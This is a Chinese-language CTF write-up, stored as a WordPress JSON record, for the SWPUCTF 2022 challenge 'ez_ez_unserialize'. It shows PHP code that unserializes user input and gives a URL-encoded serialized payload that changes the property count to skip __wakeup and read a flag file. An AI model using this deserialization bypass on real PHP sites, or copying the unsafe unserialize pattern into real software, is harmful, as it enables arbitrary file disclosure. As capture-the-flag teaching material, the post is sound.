{"id":2203,"date":"2025-04-01T23:37:44","date_gmt":"2025-04-01T15:37:44","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=2203"},"modified":"2025-04-01T23:37:45","modified_gmt":"2025-04-01T15:37:45","slug":"swpuctf-2022-%e6%96%b0%e7%94%9f%e8%b5%9bez_ez_unserialize","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/04\/01\/swpuctf-2022-%e6%96%b0%e7%94%9f%e8%b5%9bez_ez_unserialize\/","title":{"rendered":"SWPUCTF 2022 \u65b0\u751f\u8d5bez_ez_unserialize"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/04\/Pasted-image-20250401224714.png\" alt=\"Pasted image 20250401224714.png\"><\/p>\n<h1>\u4e00\u3001\u8bbf\u95ee\u7f51\u7ad9<\/h1>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/04\/Pasted-image-20250401224757.png\" alt=\"Pasted image 20250401224757.png\"><\/p>\n<h1>\u4e8c\u3001\u5206\u6790\u4ee3\u7801<\/h1>\n<pre><code class=\"language-php\">&lt;?php  \nclass\u00a0X  \n{  \n\u00a0\u00a0\u00a0\u00a0public\u00a0$x\u00a0=\u00a0__FILE__;  \n\u00a0\u00a0\u00a0\u00a0function\u00a0__construct($x)  \n\u00a0\u00a0\u00a0\u00a0{\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$this-&gt;x\u00a0=\u00a0$x;  \n\u00a0\u00a0\u00a0\u00a0}  \n\u00a0\u00a0\u00a0\u00a0function\u00a0__wakeup()  \n\u00a0\u00a0\u00a0\u00a0{  \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if\u00a0($this-&gt;x\u00a0!==\u00a0__FILE__)\u00a0{\u00a0\u00a0\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$this-&gt;x\u00a0=\u00a0__FILE__;  \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0}  \n\u00a0\u00a0\u00a0\u00a0}  \n\u00a0\u00a0\u00a0\u00a0function\u00a0__destruct()  \n\u00a0\u00a0\u00a0\u00a0{\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0highlight_file($this-&gt;x);\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/flag\u00a0is\u00a0in\u00a0fllllllag.php\u00a0\u00a0\u00a0\u00a0}  \n}  \nif\u00a0(isset($_REQUEST['x']))\u00a0{  \n\u00a0\u00a0\u00a0\u00a0@unserialize($_REQUEST['x']);  \n}\u00a0else\u00a0{\u00a0\u00a0\u00a0\n\thighlight_file(__FILE__);  \n}\n<\/code><\/pre>\n<pre><code>\u5934\uff1ax\n\n__wekaup\u7ed5\u8fc7  $this-&gt;x=fllllllag.php\u00a0\n\n\u5c3e\uff1ax-&gt;__destruct-&gt;highlight_file $this-&gt;x=fllllllag.php\u00a0\n<\/code><\/pre>\n<p>\u89e3\u9898\u601d\u8def\uff1a<br \/>\n1.\u5934\uff1ax<br \/>\n2.\u5c3e\uff1a<code>x-&gt;__destruct-&gt;highlight_file<\/code><br \/>\n3.wakeup\u51fd\u6570\u4f1a\u5c06\u53d8\u91cfx\u8986\u76d6\uff0c\u9700\u8981\u7ed5\u8fc7<br \/>\n4.construct\u4e0d\u89e6\u53d1\uff0c\u4e0d\u7528\u7ba1<br \/>\n5.\u5c06x\u8d4b\u503c\u4e3afllllllag.php<\/p>\n<h1>\u4e09\u3001\u751f\u6210payload<\/h1>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/04\/Pasted-image-20250401225838.png\" alt=\"Pasted image 20250401225838.png\"><\/p>\n<pre><code>O:1:&quot;X&quot;:1:{s:1:&quot;x&quot;;s:13:&quot;fllllllag.php&quot;;}\n\nO%3A1%3A%22X%22%3A1%3A%7Bs%3A1%3A%22x%22%3Bs%3A13%3A%22fllllllag.php%22%3B%7D\n<\/code><\/pre>\n<p>\u7ed5\u8fc7wakeup\u9b54\u672f\u65b9\u6cd5\uff0c\u5c06\u7c7b\u5c5e\u6027\u7684\u6570\u91cf\u6539\u4e3a2<\/p>\n<pre><code>O%3A1%3A%22X%22%3A2%3A%7Bs%3A1%3A%22x%22%3Bs%3A13%3A%22fllllllag.php%22%3B%7D\n<\/code><\/pre>\n<h1>\u56db\u3001\u6267\u884cpayload<\/h1>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/04\/Pasted-image-20250401225808.png\" alt=\"Pasted image 20250401225808.png\"><\/p>\n<h1>\u603b\u7ed3<\/h1>\n<ul>\n<li>php\u53cd\u5e8f\u5217\u5316<\/li>\n<li>wakeup\u7ed5\u8fc7\uff1a\u5c06\u7c7b\u7684\u5c5e\u6027\u6570\u91cf\u66f4\u6539<\/li>\n<li>construct\u5728\u53cd\u5e8f\u5217\u5316\u4e2d\u4e0d\u89e6\u53d1<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u8bbf\u95ee\u7f51\u7ad9 \u4e8c\u3001\u5206\u6790\u4ee3\u7801 &lt;?php class\u00a0X { \u00a0\u00a0\u00a0\u00a0public\u00a0$x\u00a0=\u00a0__FILE [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24,8,22],"tags":[64,37],"class_list":["post-2203","post","type-post","status-publish","format-standard","hentry","category-buuctf","category-ctf","category-ctf-web","tag-wakeup","tag-37"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2203"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2203\/revisions"}],"predecessor-version":[{"id":2204,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2203\/revisions\/2204"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2203"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}